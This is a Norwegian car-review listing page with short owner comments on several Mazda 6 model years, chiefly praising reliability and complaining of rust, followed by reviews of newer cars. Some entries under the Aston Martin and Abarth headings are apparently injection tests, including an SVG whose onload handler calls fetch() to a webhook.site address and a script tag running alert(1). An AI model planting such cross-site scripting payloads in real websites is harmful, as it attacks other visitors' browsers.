Vurdert av Knut
Flere vurderinger fra samme generasjon
Mazda 6 (2008)
Romslig og driftsikker bil
Mazda 6 (2008)
baklys glassene er søppel, har byttet 2 ganger. men de sprekker .
Mazda 6 (2008)
En bil som anebales, billig innkjøp og billig vedlikehold.
Mazda 6 (2007)
Har vært litt problemer med "nykking" på ca 1200 omd/min. Dette viste seg at det var dyse nr 3 som ikke var helt i orden.
Mazda 6 (2006)
Landeveisbil er stikkord her! God comfort på jevnt underlag. Ellers virker den stiv og stumpene. Virker litt "nervøs" med boggivogna bak. 6 gir men litt lang utveksling på de 4 i midten. Og husk:
Mazda 6 (2006)
Har eid bilen i 5 år. Beste bilkjøp jeg har gjort. Aldri noe galt med denne bilen, ikke engang feil på elektroniken. Komfortabel bil å kjøre.
Mazda 6 (2006)
Pen og billig stasjonsvogn hvis du finner en uten rust.
Mazda 6 (2005)
På 2005 mod. som ble produsert i 2004 er det ikke et spørsmål om det finnes rustskader, kun hvor alvorlig disse rustangrepene er. Mazda måtte ta inn mange av disse bilene for garanti reparasjon et
Mazda 6 (2005)
Overall veldig god bil, går greit og behagelig å kjøre. Kjørt nærmere 40 000 på ett når med den. Aldri ett problem, og starter alltid.
Mazda 6 (2004)
10
Mazda 6 (2004)
Problem med rust og ingen garanti mot rust
Mazda 6 (2004)
veldig grei og fin bil å kjøre, ok løsninger og greit forbruk, men ikke piss i nærheten av bilen for da kommer rusten fykende som et skudd!!
Mazda 6 (2004)
Totalt en bil som har godt innfrid forventningene. Pent design, bare ødelagt av brune rustflekker rundt hjulbuene. Har rundet 200 000 km uten noen uventede problemer. Kun normale service/veldikehold.
Mazda 6 (2004)
Kjøpte bilen ny, eide den ca 8 år og kjørte den ca 83000km. Ingen driftsproblem utenom å bytte bremsekalippere bak og føler for airbag i høyre forsete. Dette var min tredje Mazda, og blei den
Mazda 6 (2004)
+ Sprek, sterk, praktisk og komfortabel, billig i drift. - rust! Hjulbuer og kanaler. Litt mye plastikk.
Flere vurderinger
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km